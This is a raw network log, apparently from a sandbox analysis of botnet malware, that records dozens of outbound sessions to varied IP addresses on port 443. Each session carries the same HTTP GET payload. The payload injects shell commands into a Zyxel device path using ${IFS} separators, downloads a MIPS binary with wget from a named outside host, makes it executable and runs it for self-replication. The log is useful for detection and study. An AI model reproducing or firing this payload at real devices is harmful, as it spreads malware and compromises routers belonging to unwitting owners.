                                                  Jan 19, 2024 18:24:07.282592058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7142192.168.2.1360102107.241.234.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282650948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7143192.168.2.134126434.75.136.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282680035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7144192.168.2.134708068.40.49.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282704115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7145192.168.2.134538679.164.25.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282773018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7146192.168.2.1359050122.71.144.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282812119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7147192.168.2.1347896206.218.145.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282872915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7148192.168.2.1337896134.216.26.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282912016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7149192.168.2.135147481.227.20.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282948971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7150192.168.2.135686470.220.180.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282993078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7151192.168.2.1337928104.150.17.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283042908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7152192.168.2.1338522191.57.105.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283081055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7153192.168.2.1339752194.53.17.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283102036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7154192.168.2.133713249.115.83.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283159018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7155192.168.2.1345380206.151.177.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283186913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7156192.168.2.133755234.9.172.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283227921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7157192.168.2.1348440179.171.187.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283260107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7158192.168.2.1343718117.218.132.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283325911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7159192.168.2.135171685.47.102.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283344984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7160192.168.2.135643491.193.200.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283396959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7161192.168.2.134930693.203.63.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283436060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7162192.168.2.1359822171.148.218.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283482075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7163192.168.2.134884618.86.8.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283523083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7164192.168.2.13338504.145.105.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283546925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7165192.168.2.1358430105.194.17.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283586979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7166192.168.2.1339610114.224.216.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283644915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7167192.168.2.134655254.58.224.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283687115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7168192.168.2.133926465.102.54.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283709049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7169192.168.2.1337768194.85.140.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283746958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7170192.168.2.1335274198.239.103.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283790112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7171192.168.2.135094878.112.85.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283818960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7172192.168.2.1346724124.189.89.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283837080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7173192.168.2.1349894183.170.66.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283905983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7174192.168.2.135257658.213.28.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283936024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7175192.168.2.134368277.125.153.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.283979893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7176192.168.2.13447405.76.40.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284028053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7177192.168.2.133670058.160.64.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284054995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7178192.168.2.134942427.215.158.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284087896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7179192.168.2.1354014115.28.97.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284152985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7180192.168.2.134947289.40.248.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284162045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7181192.168.2.1337814218.52.115.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284172058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7182192.168.2.133912881.76.243.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284219980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7183192.168.2.133378485.32.179.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284272909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7184192.168.2.1337532188.206.78.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284323931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7185192.168.2.1359236167.101.47.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284356117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7186192.168.2.1352410216.234.66.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284404039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7187192.168.2.1346078170.189.19.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284456015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7188192.168.2.1345872212.78.49.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284490108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7189192.168.2.13517529.68.13.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284528971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7190192.168.2.1357632213.252.251.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284559011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7191192.168.2.133541254.214.81.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284599066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7192192.168.2.1357306203.43.171.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284621000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7193192.168.2.134334279.100.168.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284672976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7194192.168.2.1349404130.182.192.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284703016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7195192.168.2.134190276.205.247.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284756899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7196192.168.2.135011435.24.169.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284806967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7197192.168.2.1335170126.90.165.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284830093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7198192.168.2.13543202.233.178.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284862995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7199192.168.2.1346988206.17.110.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284919024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7200192.168.2.136027632.6.165.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284941912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7201192.168.2.1345886107.100.78.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.284986973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7202192.168.2.1336248185.57.190.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285032988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7203192.168.2.133915457.232.35.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.285057068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7204192.168.2.1337560204.112.44.14443
                                                  TimestampBytes transferredDirectionData
